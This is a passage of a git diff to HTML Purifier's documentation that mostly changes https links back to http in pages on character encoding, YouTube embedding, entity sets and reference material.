href="http://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div> <p>Character encoding and character sets are not that difficult to understand, but so many people blithely stumble @@ -217,7 +217,7 @@ if your <code>META</code> tag claims that either:</p> <p class="aside">The advice given here is for pages being served as vanilla <code>text/html</code>. Different practices must be used for <code>application/xml</code> or <code>application/xml+xhtml</code>, see -<a href="https://www.w3.org/TR/2002/NOTE-xhtml-media-types-20020430/">W3C's +<a href="http://www.w3.org/TR/2002/NOTE-xhtml-media-types-20020430/">W3C's document on XHTML media types</a> for more information.</p> <p>If your <code>META</code> encoding and your real encoding match, @@ -237,7 +237,7 @@ of your real encoding.</p> has to guess: and sometimes the guess is wrong. Hackers can manipulate this guess in order to slip XSS past filters and then fool the browser into executing it as active code. A great example of this - is the <a href="https://shiflett.org/archive/177">Google UTF-7 + is the <a href="http://shiflett.org/archive/177">Google UTF-7 exploit</a>.</p> <p>You might be able to get away with not specifying a character encoding with the <code>META</code> tag as long as your webserver @@ -299,10 +299,10 @@ is slightly more difficult.</p> yourself, via your programming language. Since you're using HTML Purifier, I'll assume PHP, although it's not too difficult to do similar things in -<a href="https://www.w3.org/International/O-HTTP-charset#scripting">other +<a href="http://www.w3.org/International/O-HTTP-charset#scripting">other languages</a>. The appropriate code is:</p> -<pre><a href="https://php.net/function.header">header</a>('Content-Type:text/html; charset=UTF-8');</pre> +<pre><a href="http://php.net/function.header">header</a>('Content-Type:text/html; charset=UTF-8');</pre> <p>...replacing UTF-8 with whatever your embedded encoding is. This code must come before any output, so be careful about @@ -312,16 +312,16 @@ output excluding whitespace within <?php ?> tags).</p> <h4 id="fixcharset-server-phpini">PHP ini directive</h4> <p>PHP also has a neat little ini directive that can save you a -header call: <code><a href="https://php.net/ini.core#ini.default-charset">default_charset</a></code>. Using this code:</p> +header call: <code><a href="http://php.net/ini.core#ini.default-charset">default_charset</a></code>. Using this code:</p> -<pre><a href="https://php.net/function.ini_set">ini_set</a>('default_charset', 'UTF-8');</pre> +<pre><a href="http://php.net/function.ini_set">ini_set</a>('default_charset', 'UTF-8');</pre> <p>...will also do the trick. If PHP is running as an Apache module (and not as FastCGI, consult -<a href="https://php.net/phpinfo">phpinfo</a>() for details), you can even use htaccess to apply this property +<a href="http://php.net/phpinfo">phpinfo</a>() for details), you can even use htaccess to apply this property across many PHP files:</p> -<pre><a href="https://php.net/configuration.changes#configuration.changes.apache">php_value</a> default_charset "UTF-8"</pre> +<pre><a href="http://php.net/configuration.changes#configuration.changes.apache">php_value</a> default_charset "UTF-8"</pre> <blockquote class="aside"><p>As with all INI directives, this can also go in your php.ini file. Some hosting providers allow you to customize @@ -340,11 +340,11 @@ techniques may work, or may not work.</p> <p>On Apache, you can use an .htaccess file to change the character encoding. I'll defer to -<a href="https://www.w3.org/International/questions/qa-htaccess-charset">W3C</a> +<a href="http://www.w3.org/International/questions/qa-htaccess-charset">W3C</a> for the in-depth explanation, but it boils down to creating a file named .htaccess with the contents:</p> -<pre><a href="https://httpd.apache.org/docs/1.3/mod/mod_mime.html#addcharset">AddCharset</a> UTF-8 .html</pre> +<pre><a href="http://httpd.apache.org/docs/1.3/mod/mod_mime.html#addcharset">AddCharset</a> UTF-8 .html</pre> <p>Where UTF-8 is replaced with the character encoding you want to use and .html is a file extension that this will be applied to. This @@ -353,7 +353,7 @@ or in the subdirectories of directory you place this file in.</p> <p>If you're feeling particularly courageous, you can use:</p> -<pre><a href="https://httpd.apache.org/docs/1.3/mod/core.html#adddefaultcharset">AddDefaultCharset</a> UTF-8</pre> +<pre><a href="http://httpd.apache.org/docs/1.3/mod/core.html#adddefaultcharset">AddDefaultCharset</a> UTF-8</pre> <p>...which changes the character set Apache adds to any document that doesn't have any Content-Type parameters. This directive, which the @@ -363,7 +363,7 @@ with the <code>META</code> tag. If you would prefer Apache not to be butting in on your character encodings, you can tell it not to send anything at all:</p> -<pre><a href="https://httpd.apache.org/docs/1.3/mod/core.html#adddefaultcharset">AddDefaultCharset</a> Off</pre> +<pre><a href="http://httpd.apache.org/docs/1.3/mod/core.html#adddefaultcharset">AddDefaultCharset</a> Off</pre> <p>...making your internal charset declaration (usually the <code>META</code> tags) the sole source of character encoding @@ -445,7 +445,7 @@ overrides the <code>META</code> tag. In reality, this happens only when the XHTML is actually served as legit XML and not HTML, which is almost always never due to Internet Explorer's lack of support for <code>application/xhtml+xml</code> (even though doing so is often -argued to be <a href="https://www.hixie.ch/advocacy/xhtml">good +argued to be <a href="http://www.hixie.ch/advocacy/xhtml">good practice</a> and is required by the XHTML 1.1 specification).</p> <p>For XML, however, this XML Declaration is extremely important. @@ -554,7 +554,7 @@ when it became far to cumbersome to support foreign languages. Bots will now actually go through articles and convert character entities to their corresponding real characters for the sake of user-friendliness and searchability. See -<a href="https://meta.wikimedia.org/wiki/Help:Special_characters">Meta's +<a href="http://meta.wikimedia.org/wiki/Help:Special_characters">Meta's page on special characters</a> for more details. </p></blockquote> @@ -575,7 +575,7 @@ which may be used by POST, and is required when you want to upload files.</p> <p>The following is a summarization of notes from -<a href="https://web.archive.org/web/20060427015200/ppewww.ph.gla.ac.uk/~flavell/charset/form-i18n.html"> +<a href="http://web.archive.org/web/20060427015200/ppewww.ph.gla.ac.uk/~flavell/charset/form-i18n.html"> <code>FORM</code> submission and i18n</a>. That document contains lots of useful information, but is written in a rambly manner, so here I try to get right to the point. (Note: the original has @@ -589,7 +589,7 @@ looks something like: <code>%C3%86</code>. There is no official way of determining the character encoding of such a request, since the percent encoding operates on a byte level, so it is usually assumed that it is the same as the encoding the page containing the form was submitted -in. (<a href="https://tools.ietf.org/html/rfc3986#section-2.5">RFC 3986</a> +in. (<a href="http://tools.ietf.org/html/rfc3986#section-2.5">RFC 3986</a> recommends that textual identifiers be translated to UTF-8; however, browser compliance is spotty.) You'll run into very few problems if you only use characters in the character encoding you chose.</p> @@ -762,7 +762,7 @@ knows about the change too. There are some caveats though:</p> encodings is notoriously spotty. Refer to your respective database's documentation on how to do this properly.</p> -<p>For <a href="https://dev.mysql.com/doc/refman/5.0/en/charset-conversion.html">MySQL</a>, <code>ALTER</code> will magically perform the +<p>For <a href="http://dev.mysql.com/doc/refman/5.0/en/charset-conversion.html">MySQL</a>, <code>ALTER</code> will magically perform the character encoding conversion for you. However, you have to make sure that the text inside the column is what is says it is: if you had put Shift-JIS in an ISO 8859-1 column, MySQL will irreversibly mangle @@ -772,7 +772,7 @@ and then finally to UTF-8. Many a website had pages irreversibly mangled because they didn't realize that they'd been deluding themselves about the character encoding all along; don't become the next victim.</p> -<p>For <a href="https://www.postgresql.org/docs/8.2/static/multibyte.html">PostgreSQL</a>, there appears to be no direct way to change the +<p>For <a href="http://www.postgresql.org/docs/8.2/static/multibyte.html">PostgreSQL</a>, there appears to be no direct way to change the encoding of a database (as of 8.2). You will have to dump the data, and then reimport it into a new table. Make sure that your client encoding is set properly: this is how PostgreSQL knows to perform an encoding conversion.</p> @@ -832,15 +832,15 @@ converting reams of existing text and HTML files into UTF-8, as well as making sure that all new files uploaded are properly encoded. Once again, I can only point vaguely in the right direction for converting your existing files: make sure you backup, make sure you use -<a href="https://php.net/ref.iconv">iconv</a>(), and +<a href="http://php.net/ref.iconv">iconv</a>(), and make sure you know what the original character encoding of the files is (or are, depending on the tidiness of your system).</p> <p>However, I can proffer more specific advice on the subject of text editors. Many text editors have notoriously spotty Unicode support. To find out how your editor is doing, you can check out <a -href="https://www.alanwood.net/unicode/utilities_editors.html">this list</a> -or <a href="https://en.wikipedia.org/wiki/Comparison_of_text_editors#Encoding_support">Wikipedia's list.</a> +href="http://www.alanwood.net/unicode/utilities_editors.html">this list</a> +or <a href="http://en.wikipedia.org/wiki/Comparison_of_text_editors#Encoding_support">Wikipedia's list.</a> I personally use Notepad++, which works like a charm when it comes to UTF-8. Usually, you will have to <strong>explicitly</strong> tell the editor through some dialogue (usually Save as or Format) what encoding you want it to use. An editor @@ -859,7 +859,7 @@ BOM below.</p> <h3 id="migrate-bom">Byte Order Mark (headers already sent!)</h3> -<p>The BOM, or <a href="https://en.wikipedia.org/wiki/Byte_Order_Mark">Byte +<p>The BOM, or <a href="http://en.wikipedia.org/wiki/Byte_Order_Mark">Byte Order Mark</a>, is a magical, invisible character placed at the beginning of UTF-8 files to tell people what the encoding is and what the endianness of the text is. It is also unnecessary.</p> @@ -917,7 +917,7 @@ anyway. So we'll deal with the other two edge cases.</p> would like to read your website but get heaps of question marks or other meaningless characters. Fixing this problem requires the installation of a font or language pack which is often highly -dependent on what the language is. <a href="https://bn.wikipedia.org/wiki/%E0%A6%89%E0%A6%87%E0%A6%95%E0%A6%BF%E0%A6%AA%E0%A7%87%E0%A6%A1%E0%A6%BF%E0%A6%AF%E0%A6%BC%E0%A6%BE:Bangla_script_display_and_input_help">Here is an example</a> +dependent on what the language is. <a href="http://bn.wikipedia.org/wiki/%E0%A6%89%E0%A6%87%E0%A6%95%E0%A6%BF%E0%A6%AA%E0%A7%87%E0%A6%A1%E0%A6%BF%E0%A6%AF%E0%A6%BC%E0%A6%BE:Bangla_script_display_and_input_help">Here is an example</a> of such a help file for the Bengali language; I am sure there are others out there too. You just have to point users to the appropriate help file.</p> @@ -927,7 +927,7 @@ help file.</p> <p>A prime example of when you'll see some very obscure Unicode characters embedded in what otherwise would be very bland ASCII are letters of the -<a href="https://en.wikipedia.org/wiki/International_Phonetic_Alphabet">International +<a href="http://en.wikipedia.org/wiki/International_Phonetic_Alphabet">International Phonetic Alphabet (IPA)</a>, use to designate pronunciations in a very standard manner (you probably see them all the time in your dictionary). Your average font probably won't have support for all of the IPA characters @@ -947,10 +947,10 @@ to known good Unicode fonts.</p> <p>Fortunately, the folks over at Wikipedia have already done all the heavy lifting for you. Get the CSS from the horses mouth here: -<a href="https://en.wikipedia.org/wiki/MediaWiki:Common.css">Common.css</a>, +<a href="http://en.wikipedia.org/wiki/MediaWiki:Common.css">Common.css</a>, and search for ".IPA" There are also a smattering of other classes you can use for other purposes, check out -<a href="https://meta.wikimedia.org/wiki/Help:Special_characters#Displaying_Special_Characters">this page</a> +<a href="http://meta.wikimedia.org/wiki/Help:Special_characters#Displaying_Special_Characters">this page</a> for more details. For you lazy ones, this should work:</p> <pre>.Unicode { @@ -964,7 +964,7 @@ for more details. For you lazy ones, this should work:</p> <p>The standard usage goes along the lines of <code><span class="Unicode">Crazy Unicode stuff here</span></code>. Characters in the -<a href="https://en.wikipedia.org/wiki/Windows_Glyph_List_4">Windows Glyph List</a> +<a href="http://en.wikipedia.org/wiki/Windows_Glyph_List_4">Windows Glyph List</a> usually don't need to be fixed, but for anything else you probably want to play it safe. Unless, of course, you don't care about IE6 users.</p> @@ -994,10 +994,10 @@ and yes, it is variable width. Other traits:</p> <p>Each of these traits affect different domains of text processing in different ways. It is beyond the scope of this document to explain what precisely these implications are. PHPWact provides -a very good <a href="https://www.phpwact.org/php/i18n/utf-8">reference document</a> +a very good <a href="http://www.phpwact.org/php/i18n/utf-8">reference document</a> on what to expect from each function, although coverage is spotty in some areas. Their more general notes on -<a href="https://www.phpwact.org/php/i18n/charsets">character sets</a> +<a href="http://www.phpwact.org/php/i18n/charsets">character sets</a> are also worth looking at for information on UTF-8. Some rules of thumb when dealing with Unicode text:</p> @@ -1024,7 +1024,7 @@ usually won't matter since substr() also operates with byte indices!</p> <p>You'll also need to make sure your UTF-8 is well-formed and will probably need replacements for some of these functions. I recommend -using Harry Fuecks' <a href="https://phputf8.sourceforge.net/">PHP +using Harry Fuecks' <a href="http://phputf8.sourceforge.net/">PHP UTF-8</a> library, rather than use mb_string directly. HTML Purifier also defines a few useful UTF-8 compatible functions: check out <code>Encoder.php</code> in the <code>/library/HTMLPurifier/</code> @@ -1042,12 +1042,12 @@ UTF-8 and internationalization, and I would like to defer to them for a more in-depth look into character sets and encodings.</p> <ul> - <li><a href="https://www.joelonsoftware.com/articles/Unicode.html"> + <li><a href="http://www.joelonsoftware.com/articles/Unicode.html"> The Absolute Minimum Every Software Developer Absolutely, Positively Must Know About Unicode and Character Sets (No Excuses!)</a> by Joel Spolsky, provides a <em>very</em> good high-level look at Unicode and character sets in general.</li> - <li><a href="https://en.wikipedia.org/wiki/UTF-8">UTF-8 on Wikipedia</a>, + <li><a href="http://en.wikipedia.org/wiki/UTF-8">UTF-8 on Wikipedia</a>, provides a lot of useful details into the innards of UTF-8, although it may be a little off-putting to people who don't know much about Unicode to begin with.</li> diff --git a/htmlpurifier-4.10.0/docs/enduser-youtube.html b/htmlpurifier-4.10.0/docs/enduser-youtube.html index c89529d..f85a2c9 100755 --- a/htmlpurifier-4.10.0/docs/enduser-youtube.html +++ b/htmlpurifier-4.10.0/docs/enduser-youtube.html @@ -1,7 +1,7 @@ <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" - "https://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> -<html xmlns="https://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> + "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> +<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta name="description" content="Explains how to safely allow the embedding of flash from trusted sites in HTML Purifier." /> <link rel="stylesheet" type="text/css" href="./style.css" /> @@ -15,7 +15,7 @@ <div id="filing">Filed under End-User</div> <div id="index">Return to the <a href="index.html">index</a>.</div> -<div id="home"><a href="https://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div> +<div id="home"><a href="http://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div> <p>Clients like their YouTube videos. It gives them a warm fuzzy feeling when they see a neat little embedded video player on their websites that can play @@ -26,7 +26,7 @@ content in their pages is something that a lot of people like.</p> <p>This is a <em>bad</em> idea. The moment you embed anything untrusted, you will definitely be slammed by a manner of nasties that can be embedded in things from your run of the mill Flash movie to -<a href="https://blog.spywareguide.com/2006/12/myspace_phish_attack_leads_use.html">Quicktime movies</a>. +<a href="http://blog.spywareguide.com/2006/12/myspace_phish_attack_leads_use.html">Quicktime movies</a>. Even <code>img</code> tags, which HTML Purifier allows by default, can be dangerous. Be distrustful of anything that tells a browser to load content from another website automatically.</p> @@ -48,9 +48,9 @@ into your documents. YouTube's code goes like this:</p> <pre> <object width="425" height="350"> - <param name="movie" value="https://www.youtube.com/v/AyPzM5WK8ys" /> + <param name="movie" value="http://www.youtube.com/v/AyPzM5WK8ys" /> <param name="wmode" value="transparent" /> - <embed src="https://www.youtube.com/v/AyPzM5WK8ys" + <embed src="http://www.youtube.com/v/AyPzM5WK8ys" type="application/x-shockwave-flash" wmode="transparent" width="425" height="350" /> </object> @@ -70,7 +70,7 @@ into your documents. YouTube's code goes like this:</p> class="youtube-embed">AyPzM5WK8ys</span></code> your application can reconstruct the full object from this small snippet that passes through HTML Purifier <em>unharmed</em>. -<a href="https://repo.or.cz/w/htmlpurifier.git?a=blob;hb=HEAD;f=library/HTMLPurifier/Filter/YouTube.php">Show me the code!</a></p> +<a href="http://repo.or.cz/w/htmlpurifier.git?a=blob;hb=HEAD;f=library/HTMLPurifier/Filter/YouTube.php">Show me the code!</a></p> <p>And the corresponding usage:</p> @@ -124,9 +124,9 @@ number.</p> tech-savvy enough people not to allow their users to inject malicious code into the Flash files. An exploit on YouTube means an exploit on your site. Even though YouTube is run by the reputable Google, it -<a href="https://ha.ckers.org/blog/20061213/google-xss-vuln/">doesn't</a> +<a href="http://ha.ckers.org/blog/20061213/google-xss-vuln/">doesn't</a> mean they are -<a href="https://ha.ckers.org/blog/20061208/xss-in-googles-orkut/">invulnerable.</a> +<a href="http://ha.ckers.org/blog/20061208/xss-in-googles-orkut/">invulnerable.</a> You're putting a certain measure of the job on an external provider (just as you have by entrusting your user input to HTML Purifier), and it is important that you are cognizant of the risk.</p> diff --git a/htmlpurifier-4.10.0/docs/entities/xhtml-lat1.ent b/htmlpurifier-4.10.0/docs/entities/xhtml-lat1.ent index 4087488..7b7b407 100755 --- a/htmlpurifier-4.10.0/docs/entities/xhtml-lat1.ent +++ b/htmlpurifier-4.10.0/docs/entities/xhtml-lat1.ent @@ -6,7 +6,7 @@ <!-- Character entity set. Typical invocation: <!ENTITY % HTMLlat1 PUBLIC "-//W3C//ENTITIES Latin 1 for XHTML//EN" - "https://www.w3.org/TR/xhtml1/DTD/xhtml-lat1.ent"> + "http://www.w3.org/TR/xhtml1/DTD/xhtml-lat1.ent"> %HTMLlat1; --> diff --git a/htmlpurifier-4.10.0/docs/entities/xhtml-special.ent b/htmlpurifier-4.10.0/docs/entities/xhtml-special.ent index 19db25b..2ea205f 100755 --- a/htmlpurifier-4.10.0/docs/entities/xhtml-special.ent +++ b/htmlpurifier-4.10.0/docs/entities/xhtml-special.ent @@ -3,7 +3,7 @@ <!-- Character entity set. Typical invocation: <!ENTITY % HTMLspecial PUBLIC "-//W3C//ENTITIES Special for XHTML//EN" - "https://www.w3.org/TR/xhtml1/DTD/xhtml-special.ent"> + "http://www.w3.org/TR/xhtml1/DTD/xhtml-special.ent"> %HTMLspecial; --> diff --git a/htmlpurifier-4.10.0/docs/entities/xhtml-symbol.ent b/htmlpurifier-4.10.0/docs/entities/xhtml-symbol.ent index c118af8..3f8f8e6 100755 --- a/htmlpurifier-4.10.0/docs/entities/xhtml-symbol.ent +++ b/htmlpurifier-4.10.0/docs/entities/xhtml-symbol.ent @@ -3,7 +3,7 @@ <!-- Character entity set. Typical invocation: <!ENTITY % HTMLsymbol PUBLIC "-//W3C//ENTITIES Symbols for XHTML//EN" - "https://www.w3.org/TR/xhtml1/DTD/xhtml-symbol.ent"> + "http://www.w3.org/TR/xhtml1/DTD/xhtml-symbol.ent"> %HTMLsymbol; --> diff --git a/htmlpurifier-4.10.0/docs/index.html b/htmlpurifier-4.10.0/docs/index.html index 9f3ce86..367fded 100755 --- a/htmlpurifier-4.10.0/docs/index.html +++ b/htmlpurifier-4.10.0/docs/index.html @@ -1,7 +1,7 @@ <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" - "https://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> -<html xmlns="https://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> + "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> +<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta name="description" content="Index to all HTML Purifier documentation." /> <link rel="stylesheet" type="text/css" href="./style.css" /> @@ -13,7 +13,7 @@ <h1>Documentation</h1> -<p><strong><a href="https://htmlpurifier.org/">HTML Purifier</a></strong> has documentation for all types of people. +<p><strong><a href="http://htmlpurifier.org/">HTML Purifier</a></strong> has documentation for all types of people. Here is an index of all of them.</p> <h2>End-user</h2> diff --git a/htmlpurifier-4.10.0/docs/proposal-colors.html b/htmlpurifier-4.10.0/docs/proposal-colors.html index 085f63f..647d3b8 100755 --- a/htmlpurifier-4.10.0/docs/proposal-colors.html +++ b/htmlpurifier-4.10.0/docs/proposal-colors.html @@ -1,7 +1,7 @@ <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" - "https://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> -<html xmlns="https://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> + "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> +<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta name="description" content="Proposal to allow for color constraints in HTML Purifier." /> <link rel="stylesheet" type="text/css" href="./style.css" /> @@ -15,7 +15,7 @@ <div id="filing">Filed under Proposals</div> <div id="index">Return to the <a href="index.html">index</a>.</div> -<div id="home"><a href="https://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div> +<div id="home"><a href="http://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div> <p>Your website probably has a color-scheme. <span style="color:#090; background:#FFF;">Green on white</span>, diff --git a/htmlpurifier-4.10.0/docs/ref-devnetwork.html b/htmlpurifier-4.10.0/docs/ref-devnetwork.html index 023a7d4..93d9e31 100755 --- a/htmlpurifier-4.10.0/docs/ref-devnetwork.html +++ b/htmlpurifier-4.10.0/docs/ref-devnetwork.html @@ -1,7 +1,7 @@ <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" - "https://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> -<html xmlns="https://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> + "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> +<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta name="description" content="Credits and links to DevNetwork forum topics on HTML Purifier." /> <link rel="stylesheet" type="text/css" href="./style.css" /> @@ -15,27 +15,27 @@ <div id="filing">Filed under Reference</div> <div id="index">Return to the <a href="index.html">index</a>.</div> -<div id="home"><a href="https://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div> +<div id="home"><a href="http://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div> <p>Many thanks to the DevNetwork community for answering questions, theorizing about design, and offering encouragement during the development of this library in these forum threads:</p> <ul> - <li><a href="https://forums.devnetwork.net/viewtopic.php?t=52905">HTMLPurifier PHP Library hompeage</a></li> - <li><a href="https://forums.devnetwork.net/viewtopic.php?t=53056">How much of CSS to implement?</a></li> - <li><a href="https://forums.devnetwork.net/viewtopic.php?t=53083">Parsing URL only according to URI : Security Risk?</a></li> - <li><a href="https://forums.devnetwork.net/viewtopic.php?t=53096">Gimme a name : URI and friends</a></li> - <li><a href="https://forums.devnetwork.net/viewtopic.php?t=53415">How to document configuration directives</a></li> - <li><a href="https://forums.devnetwork.net/viewtopic.php?t=53479">IPv6</a></li> - <li><a href="https://forums.devnetwork.net/viewtopic.php?t=53539">http and ftp versus news and mailto</a></li> - <li><a href="https://forums.devnetwork.net/viewtopic.php?t=53579">HTMLPurifier - Take your best shot</a></li> - <li><a href="https://forums.devnetwork.net/viewtopic.php?t=53664">Need help optimizing a block of code</a></li> - <li><a href="https://forums.devnetwork.net/viewtopic.php?t=53861">Non-SGML characters</a></li> - <li><a href="https://forums.devnetwork.net/viewtopic.php?t=54283">Wordpress makes me cry</a></li> - <li><a href="https://forums.devnetwork.net/viewtopic.php?t=54478">Parameter Object vs. Parameter Array vs. Parameter Functions</a></li> - <li><a href="https://forums.devnetwork.net/viewtopic.php?t=54521">Convert encoding where output cannot represent characters</a></li> - <li><a href="https://forums.devnetwork.net/viewtopic.php?t=56411">Reporting errors in a document without line numbers</a></li> + <li><a href="http://forums.devnetwork.net/viewtopic.php?t=52905">HTMLPurifier PHP Library hompeage</a></li> + <li><a href="http://forums.devnetwork.net/viewtopic.php?t=53056">How much of CSS to implement?</a></li> + <li><a href="http://forums.devnetwork.net/viewtopic.php?t=53083">Parsing URL only according to URI : Security Risk?</a></li> + <li><a href="http://forums.devnetwork.net/viewtopic.php?t=53096">Gimme a name : URI and friends</a></li> + <li><a href="http://forums.devnetwork.net/viewtopic.php?t=53415">How to document configuration directives</a></li> + <li><a href="http://forums.devnetwork.net/viewtopic.php?t=53479">IPv6</a></li> + <li><a href="http://forums.devnetwork.net/viewtopic.php?t=53539">http and ftp versus news and mailto</a></li> + <li><a href="http://forums.devnetwork.net/viewtopic.php?t=53579">HTMLPurifier - Take your best shot</a></li> + <li><a href="http://forums.devnetwork.net/viewtopic.php?t=53664">Need help optimizing a block of code</a></li> + <li><a href="http://forums.devnetwork.net/viewtopic.php?t=53861">Non-SGML characters</a></li> + <li><a href="http://forums.devnetwork.net/viewtopic.php?t=54283">Wordpress makes me cry</a></li> + <li><a href="http://forums.devnetwork.net/viewtopic.php?t=54478">Parameter Object vs. Parameter Array vs. Parameter Functions</a></li> + <li><a href="http://forums.devnetwork.net/viewtopic.php?t=54521">Convert encoding where output cannot represent characters</a></li> + <li><a href="http://forums.devnetwork.net/viewtopic.php?t=56411">Reporting errors in a document without line numbers</a></li> </ul> <p>...as well as any I may have forgotten.</p> diff --git a/htmlpurifier-4.10.0/docs/ref-html-modularization.txt b/htmlpurifier-4.10.0/docs/ref-html-modularization.txt index 7befa21..0fd88c8 100755 --- a/htmlpurifier-4.10.0/docs/ref-html-modularization.txt +++ b/htmlpurifier-4.10.0/docs/ref-html-modularization.txt @@ -5,7 +5,7 @@ WARNING: This document was drafted before the implementation of this system, and some implementation details may have evolved over time. HTML Purifier uses the modularization of XHTML -<https://www.w3.org/TR/xhtml-modularization/> to organize the internals +<http://www.w3.org/TR/xhtml-modularization/> to organize the internals of HTMLDefinition into a more manageable and extensible fashion. Rather than have one super-object, HTMLDefinition is split into HTMLModules, each of which are responsible for defining elements, their attributes, diff --git a/htmlpurifier-4.10.0/docs/ref-whatwg.txt b/htmlpurifier-4.10.0/docs/ref-whatwg.txt index adc74eb..fa1aff6 100755 --- a/htmlpurifier-4.10.0/docs/ref-whatwg.txt +++ b/htmlpurifier-4.10.0/docs/ref-whatwg.txt @@ -4,7 +4,7 @@ Web Hypertext Application Technology Working Group == HTML 5 == -URL: https://www.whatwg.org/specs/web-apps/current-work/ +URL: http://www.whatwg.org/specs/web-apps/current-work/ HTML 5 defines a kaboodle of new elements and attributes, as well as some well-defined, "quirks mode" HTML parsing. Although WHATWG professes @@ -19,7 +19,7 @@ committing ourselves till the spec stabilizes, though. More immediately speaking though, however, is the well-defined parsing behavior that HTML 5 adds. While I have little interest in writing another DirectLex parser, other parsers like ph5p -<https://jero.net/lab/ph5p/> can be adapted to DOMLex to support much more +<http://jero.net/lab/ph5p/> can be adapted to DOMLex to support much more flexible HTML parsing (a cool feature I've seen is how they resolve <b>bold<i>both</b>italic</i>). diff --git a/htmlpurifier-4.10.0/docs/specimens/LICENSE b/htmlpurifier-4.10.0/docs/specimens/LICENSE index f378ab2..6de8d56 100755 --- a/htmlpurifier-4.10.0/docs/specimens/LICENSE +++ b/htmlpurifier-4.10.0/docs/specimens/LICENSE @@ -3,7 +3,7 @@ Licensing of Specimens Some files in this directory have different licenses: windows-live-mail-desktop-beta.html - donated by laacz, public domain -img.png - LGPL, from <https://commons.wikimedia.org/wiki/Image:Pastille_chrome.png> +img.png - LGPL, from <http://commons.wikimedia.org/wiki/Image:Pastille_chrome.png> All other files are by me, and are licensed under LGPL. diff --git a/htmlpurifier-4.10.0/docs/specimens/html-align-to-css.html b/htmlpurifier-4.10.0/docs/specimens/html-align-to-css.html index 010c457..c0a4470 100755 --- a/htmlpurifier-4.10.0/docs/specimens/html-align-to-css.html +++ b/htmlpurifier-4.10.0/docs/specimens/html-align-to-css.html @@ -1,5 +1,5 @@ <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" - "https://www.w3.org/TR/html4/loose.dtd"> + "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>HTML align attribute to CSS - HTML Purifier Specimen</title> diff --git a/htmlpurifier-4.10.0/docs/specimens/jochem-blok-word.html b/htmlpurifier-4.10.0/docs/specimens/jochem-blok-word.html index 18126b6..20d0072 100755 --- a/htmlpurifier-4.10.0/docs/specimens/jochem-blok-word.html +++ b/htmlpurifier-4.10.0/docs/specimens/jochem-blok-word.html @@ -1,4 +1,4 @@ -<html xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:w="urn:schemas-microsoft-com:office:word" xmlns:m="https://schemas.microsoft.com/office/2004/12/omml" xmlns="https://www.w3.org/TR/REC-html40"> +<html xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:w="urn:schemas-microsoft-com:office:word" xmlns:m="http://schemas.microsoft.com/office/2004/12/omml" xmlns="http://www.w3.org/TR/REC-html40"> <head> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=us-ascii"> @@ -102,8 +102,8 @@ style='color:windowtext'>mail@example.com</span></a><o:p></o:p></p> <p class=MsoNormal><span lang=EN-US style='color:black'>Fax : +xx xx xxx xx xx<o:p></o:p></span></p> <p class=MsoNormal><span lang=EN-US style='color:black'>Internet : </span><span -style='color:black'><a href="https://www.example.com/"><span lang=EN-US -style='color:black'>https://www.example.com</span></a></span><span +style='color:black'><a href="http://www.example.com/"><span lang=EN-US +style='color:black'>http://www.example.com</span></a></span><span lang=EN-US style='color:black'><o:p></o:p></span></p> <p class=MsoNormal><span lang=EN-US style='color:black'>Kamer van koophandel @@ -114,10 +114,10 @@ xxxxxxxxx<o:p></o:p></span></p> <p class=MsoNormal><span lang=EN-US style='font-size:7.5pt;color:black'>Op deze e-mail is een disclaimer van toepassing, ga naar </span><span lang=EN-US style='font-size:7.5pt'><a -href="https://www.example.com/disclaimer"><span +href="http://www.example.com/disclaimer"><span style='color:black'>www.example.com/disclaimer</span></a><br> <span style='color:black'>A disclaimer is applicable to this email, please -refer to </span><a href="https://www.example.com/disclaimer"><span +refer to </span><a href="http://www.example.com/disclaimer"><span style='color:black'>www.example.com/disclaimer</span></a><o:p></o:p></span></p> <p class=MsoNormal><span lang=EN-US><o:p> </o:p></span></p> diff --git a/htmlpurifier-4.10.0/docs/specimens/windows-live-mail-desktop-beta.html b/htmlpurifier-4.10.0/docs/specimens/windows-live-mail-desktop-beta.html index e00eef5..6139081 100755 --- a/htmlpurifier-4.10.0/docs/specimens/windows-live-mail-desktop-beta.html 